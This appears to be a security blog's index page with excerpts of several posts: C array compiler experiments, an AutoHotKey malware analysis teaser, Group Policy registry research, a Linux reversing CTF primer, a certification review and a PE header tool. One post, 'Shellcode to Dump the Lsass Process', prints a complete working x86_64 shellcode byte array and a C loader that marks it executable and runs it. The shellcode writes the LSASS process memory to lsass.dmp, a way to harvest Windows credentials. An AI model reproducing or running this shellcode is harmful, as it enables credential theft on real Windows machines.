Random Compiler Experiments on Arrays

One day a guy asked me how to print a 2d string array in C. So I coded an example for him. But just for curiosity, I examined the assembly code. In C both string[0][1] and *(*string + 1) are the same. But in reality, the compiler writes the assembly code in 2 different ways. If we use string[0][1] it will directly move the value from the stack. When we dereference a pointer *(*string + 1) it will actually dereference the address pointed inside the register. This happens only in the MinGW GCC compiler. I compiled this using the latest on Windows which is 8.2.0-3 by the time I am writing this.

The assembly code in the left is this one.

#include <stdio.h>

int main() {
    char *string[][2] = { 
     {"Osanda","Malith"},
     {"ABC","JKL"},
     {"DEF","MNO"}, 
};

	printf("%s %s\n", string[0][0], string[0][1]);
}

The assembly code on the right is this.

#include <stdio.h>

int main() {
    char *string[][2] = { 
     {"Osanda","Malith"},
     {"ABC","JKL"},
     {"DEF","MNO"}, 
};

	printf("%s %s\n", **string, *(*string + 1));
}

(more…)

Advertisements

Analyzing an AutoHotKey Malware

I found this malware spreading through the Facebook messenger. Thanks to Rashan Hasaranga for notifying me this in the first place. It was targeting Sri Lankan people on Facebook. It was a compressed “.bz” file which was spreading via the messenger. The name had “video_” and a random number.

After I downloaded the files, I checked the file hashes. I couldn’t find any analysis done before. So, I decided to get to the bottom of this. The malicious files have the extension as “.com” instead of an exe. However, it’s a compiled exe, renaming this to “com” will still run as an exe by the Windows loader.

These are the samples I found. However, they all contain the same malware. I found 2 authors compiled this from 2 different machines. Read along 😊
(more…)

Shellcode to Dump the Lsass Process

Here’s the shellcode I wrote for curiosity and ended up working nicely 🙂

This shellcode is for Windows 10 and Server 2019 x86_64.

# include <stdio.h>
# include <string.h>
# include <windows.h>
 
/*
 * Title: Shellcode to dump the lsass process
 * Works only on Windows 10 and Windows Server 2019
 * Arch: x86_64
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com    
 * Date: 11/05/2019
 */
  
int main() {

	unsigned char shellcode[822] = {
		0xE9, 0x1B, 0x03, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
		0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x10, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
		0x8B, 0xF1, 0x48, 0x8B, 0x50, 0x18, 0x4C, 0x8B, 0x4A, 0x10, 0x4D, 0x8B, 0x41, 0x30, 0x4D, 0x85,
		0xC0, 0x0F, 0x84, 0xB8, 0x00, 0x00, 0x00, 0x41, 0x0F, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3C,
		0x4D, 0x8B, 0x09, 0x42, 0x8B, 0x9C, 0x00, 0x88, 0x00, 0x00, 0x00, 0x33, 0xD2, 0xF3, 0x0F, 0x7F,
		0x04, 0x24, 0x85, 0xDB, 0x74, 0xD4, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xC1, 0xE8, 0x10, 0x44, 0x0F,
		0xB7, 0xD0, 0x45, 0x85, 0xD2, 0x74, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x45, 0x8B, 0xDA, 0xC1,
		0xCA, 0x0D, 0x80, 0x39, 0x61, 0x0F, 0xBE, 0x01, 0x7C, 0x03, 0x83, 0xC2, 0xE0, 0x03, 0xD0, 0x48,
		0xFF, 0xC1, 0x49, 0xFF, 0xCB, 0x75, 0xE8, 0x4D, 0x8D, 0x14, 0x18, 0x33, 0xC9, 0x41, 0x8B, 0x7A,
		0x20, 0x49, 0x03, 0xF8, 0x41, 0x39, 0x4A, 0x18, 0x76, 0x90, 0x8B, 0x1F, 0x45, 0x33, 0xDB, 0x48,
		0x8D, 0x7F, 0x04, 0x49, 0x03, 0xD8, 0x41, 0xC1, 0xCB, 0x0D, 0x0F, 0xBE, 0x03, 0x48, 0xFF, 0xC3,
		0x44, 0x03, 0xD8, 0x80, 0x7B, 0xFF, 0x00, 0x75, 0xED, 0x41, 0x8D, 0x04, 0x13, 0x3B, 0xC6, 0x74,
		0x0D, 0xFF, 0xC1, 0x41, 0x3B, 0x4A, 0x18, 0x72, 0xD1, 0xE9, 0x5C, 0xFF, 0xFF, 0xFF, 0x41, 0x8B,
		0x42, 0x24, 0x03, 0xC9, 0x49, 0x03, 0xC0, 0x0F, 0xB7, 0x04, 0x01, 0x41, 0x8B, 0x4A, 0x1C, 0xC1,
		0xE0, 0x02, 0x48, 0x98, 0x49, 0x03, 0xC0, 0x8B, 0x04, 0x01, 0x49, 0x03, 0xC0, 0xEB, 0x02, 0x33,
		0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x74, 0x24, 0x28, 0x48, 0x83, 0xC4, 0x10, 0x5F,
		0xC3, 0xCC, 0xCC, 0xCC, 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
		0x57, 0x48, 0x8D, 0xAC, 0x24, 0x28, 0xFF, 0xFF, 0xFF, 0x48, 0x81, 0xEC, 0xD8, 0x01, 0x00, 0x00,
		0x33, 0xC0, 0x48, 0x8D, 0x7D, 0xA0, 0xB9, 0x30, 0x01, 0x00, 0x00, 0xF3, 0xAA, 0x45, 0x33, 0xF6,
		0xB9, 0x4C, 0x77, 0x26, 0x07, 0xC7, 0x45, 0x80, 0x6B, 0x65, 0x72, 0x6E, 0xC7, 0x45, 0x84, 0x65,
		0x6C, 0x33, 0x32, 0xC7, 0x45, 0x88, 0x2E, 0x64, 0x6C, 0x6C, 0x44, 0x88, 0x75, 0x8C, 0xC7, 0x44,
		0x24, 0x70, 0x64, 0x62, 0x67, 0x63, 0xC7, 0x44, 0x24, 0x74, 0x6F, 0x72, 0x65, 0x2E, 0xC7, 0x44,
		0x24, 0x78, 0x64, 0x6C, 0x6C, 0x00, 0xC7, 0x44, 0x24, 0x60, 0x6E, 0x74, 0x64, 0x6C, 0xC7, 0x44,
		0x24, 0x64, 0x6C, 0x2E, 0x64, 0x6C, 0x66, 0xC7, 0x44, 0x24, 0x68, 0x6C, 0x00, 0xC7, 0x44, 0x24,
		0x50, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x54, 0x73, 0x2E, 0x64, 0x6D, 0x66, 0xC7, 0x44,
		0x24, 0x58, 0x70, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x44,
		0x73, 0x2E, 0x65, 0x78, 0x66, 0xC7, 0x44, 0x24, 0x48, 0x65, 0x00, 0xC6, 0x85, 0x20, 0x01, 0x00,
		0x00, 0x61, 0xE8, 0x51, 0xFE, 0xFF, 0xFF, 0x48, 0x8D, 0x4D, 0x80, 0x48, 0x8B, 0xF8, 0xFF, 0xD7,
		0x48, 0x8D, 0x4C, 0x24, 0x70, 0xFF, 0xD7, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0xD7, 0xB9, 0x80,
		0x39, 0x1E, 0x92, 0xE8, 0x30, 0xFE, 0xFF, 0xFF, 0xB9, 0xDA, 0xF6, 0xDA, 0x4F, 0x48, 0x8B, 0xF0,
		0xE8, 0x23, 0xFE, 0xFF, 0xFF, 0xB9, 0x27, 0xA9, 0xE8, 0x67, 0x48, 0x8B, 0xF8, 0xE8, 0x16, 0xFE,
		0xFF, 0xFF, 0xB9, 0x8D, 0x52, 0x01, 0xBD, 0x48, 0x8B, 0xD8, 0xE8, 0x09, 0xFE, 0xFF, 0xFF, 0xB9,
		0x74, 0x71, 0x8D, 0xDC, 0x4C, 0x8B, 0xE0, 0xE8, 0xFC, 0xFD, 0xFF, 0xFF, 0xB9, 0xB4, 0x73, 0x8D,
		0xE2, 0x4C, 0x8B, 0xF8, 0xE8, 0xEF, 0xFD, 0xFF, 0xFF, 0xB9, 0xEE, 0x95, 0xB6, 0x50, 0x4C, 0x8B,
		0xE8, 0xE8, 0xE2, 0xFD, 0xFF, 0xFF, 0xB9, 0x3D, 0xD7, 0xC8, 0x6E, 0x48, 0x89, 0x85, 0x30, 0x01,
		0x00, 0x00, 0xE8, 0xD1, 0xFD, 0xFF, 0xFF, 0xB9, 0x7A, 0x19, 0x77, 0x6A, 0x48, 0x89, 0x45, 0x90,
		0xE8, 0xC3, 0xFD, 0xFF, 0xFF, 0x4C, 0x8D, 0x8D, 0x28, 0x01, 0x00, 0x00, 0x41, 0x8D, 0x4E, 0x14,
		0x45, 0x33, 0xC0, 0xB2, 0x01, 0xFF, 0xD0, 0x4C, 0x21, 0x74, 0x24, 0x30, 0x48, 0x8D, 0x4C, 0x24,
		0x50, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x00, 0x00, 0x10, 0xC7, 0x44, 0x24, 0x28,
		0x80, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xD7, 0x33, 0xD2,
		0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8D, 0x4A, 0x02, 0xFF, 0xD6, 0x48, 0x8D, 0x55, 0xA0,
		0xC7, 0x45, 0xA0, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0x48, 0x8B, 0xF8, 0xFF, 0xD3, 0x33,
		0xDB, 0x85, 0xC0, 0x74, 0x31, 0xEB, 0x1C, 0x48, 0x8D, 0x55, 0xA0, 0x48, 0x8B, 0xCF, 0x41, 0xFF,
		0xD4, 0x48, 0x8D, 0x55, 0xCC, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41, 0xFF, 0xD5, 0x44,
		0x8B, 0x75, 0xA8, 0x48, 0x8D, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41,
		0xFF, 0xD7, 0x85, 0xC0, 0x75, 0xD1, 0x45, 0x8B, 0xC6, 0x33, 0xD2, 0xB9, 0xFF, 0xFF, 0x1F, 0x00,
		0xFF, 0x95, 0x30, 0x01, 0x00, 0x00, 0x4C, 0x8B, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C,
		0x24, 0x30, 0x48, 0x8B, 0xC8, 0x41, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x48, 0x89,
		0x5C, 0x24, 0x28, 0x48, 0x89, 0x5C, 0x24, 0x20, 0xFF, 0x55, 0x90, 0x48, 0x81, 0xC4, 0xD8, 0x01,
		0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0x5D, 0xC3, 0xCC,
		0x56, 0x48, 0x8B, 0xF4, 0x48, 0x83, 0xE4, 0xF0, 0x48, 0x83, 0xEC, 0x20, 0xE8, 0xD3, 0xFD, 0xFF,
		0xFF, 0x48, 0x8B, 0xE6, 0x5E, 0xC3
	};
    
    DWORD oldProtect;
    BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
   
    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    }
   
    ((void(*)(void))shellcode)();
  
    VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
   
    return EXIT_SUCCESS;
}

(more…)

Determining Registry Keys of Group Policy Settings

One night I was curious about how the Group Policy Manager sets the policies using registry keys. The GUI displays detailed descriptions but not the backend registry key the target policy uses.
Of course, if you Google a policy you can end up finding the target registry value or have a look at the “C:\windows\policydefinitions” folder for the admx files. But I wanted to see for myself how this works behind the scenes. So, I used the API Monitor to monitor the APIs and check the values manually.

Let’s have a look at the policy where we can disable the right click.

The process is “mmc.exe”, the Microsoft Management Console. The Local Group Policy Editor – “gpedit.msc” is just one snap-in of it.
(more…)

Linux Reverse Engineering CTFs for Beginners

After a while, I decided a write a short blog post about Linux binary reversing CTFs in general. How to approach a binary and solving for beginners. I personally am not a fan of Linux reverse engineering challenges in general, since I focus more time on Windows reversing. I like windows reverse engineering challenges more. A reason me liking Windows is as a pentester daily I encounter Windows machines and it’s so rare I come across an entire network running Linux. Even when it comes to exploit development it’s pretty rare you will manually develop an exploit for a Linux software while pentesting. But this knowledge is really useful when it comes to IoT, since almost many devices are based on Linux embedded. If you want to begin reverse engineering and exploit development starting from Linux would be a good idea. I too started from Linux many years ago. Saying that since some people when they see a reverse engineering challenge they try to run away. So if you are a newbie I hope this content might be useful for you to begin with.

The ELF Format

Let’s first have a look at the ELF headers. The best way to learn more about this in detail is to check the man pages for ELF.

Here’s in more detail. The “e_shoff” member holds the offset to the section header table. The “sh_offset” member holds the address to the section’s first byte.
(more…)

eCPTX Passed !

First of all, a huge thank you to eLearnSecurity for gifting me this great course last year. I am happy to say that I passed eCPTX in my first attempt. I think companies must look for this certificate when hiring for pentesters in the future. Because in the real world most of the time I pentest Windows environments, so this exam perfectly fits into the day to day job I do. The attacks were the same I had to perform in the real world.

As always their material was well documented. I’ve learned so much of new things I never knew before. There were so much of things to research.

I had no issues with the lab, but however, I do not like the fact that we have to press OK to extend the lab or else the lab will disconnect. Due to this, sometimes I had to start over again when the shells died. Apart from that, I would like to mention that it’s better to have some more labs for the material to practice with a good Active Directory environment.

This is the best exam I’ve done in pentesting, a really awesome challenge in 2 days. I started my journey with eLearnSecurity when I was 18 and now I’m 22 and within these few years I’ve learned a lot and helped me become good at what I do 🙂

For the guys who are going to take this exam you really need to focus on the following areas.

  • Advanced penetration testing processes and methodologies
  • Advanced Exploitation using Metasploit and Empire
  • Network/traffic manipulation
  • Pivoting
  • Advanced Lateral Movement (WMI, PS Remoting, DCOM, etc.)
  • Advanced Active Directory Information Gathering, Enumeration and Reconnaissance
  • Custom Attack Vector Development
  • Active Directory and Windows internals
  • Knowledge of Windows authentication weaknesses
  • Web application Manual exploitation
  • Stealthy Scanning and Profiling the target
  • Advanced Persistence / Backdooring
  • Privilege escalation

(more…)

PE Sec Info – A Simple Tool to Manipulate ASLR and DEP Flags

Recently I was interested in exploring the PE headers and writing simple programs to manipulate different headers. There are thousands of applications and code to be found on this topic. I started by exploring this Windows structure called “LOADED_IMAGE”.

typedef struct _LOADED_IMAGE {
  PSTR                  ModuleName;
  HANDLE                hFile;
  PUCHAR                MappedAddress;
#if ...
  PIMAGE_NT_HEADERS64   FileHeader;
#else
  PIMAGE_NT_HEADERS32   FileHeader;
#endif
  PIMAGE_SECTION_HEADER LastRvaSection;
  ULONG                 NumberOfSections;
  PIMAGE_SECTION_HEADER Sections;
  ULONG                 Characteristics;
  BOOLEAN               fSystemImage;
  BOOLEAN               fDOSImage;
  BOOLEAN               fReadOnly;
  UCHAR                 Version;
  LIST_ENTRY            Links;
  ULONG                 SizeOfImage;
} LOADED_IMAGE, *PLOADED_IMAGE;

https://docs.microsoft.com/en-us/windows/desktop/api/dbghelp/ns-dbghelp-_loaded_image

I fired up WinDBG and had a close a look how these look like with mapped memory addresses.


(more…)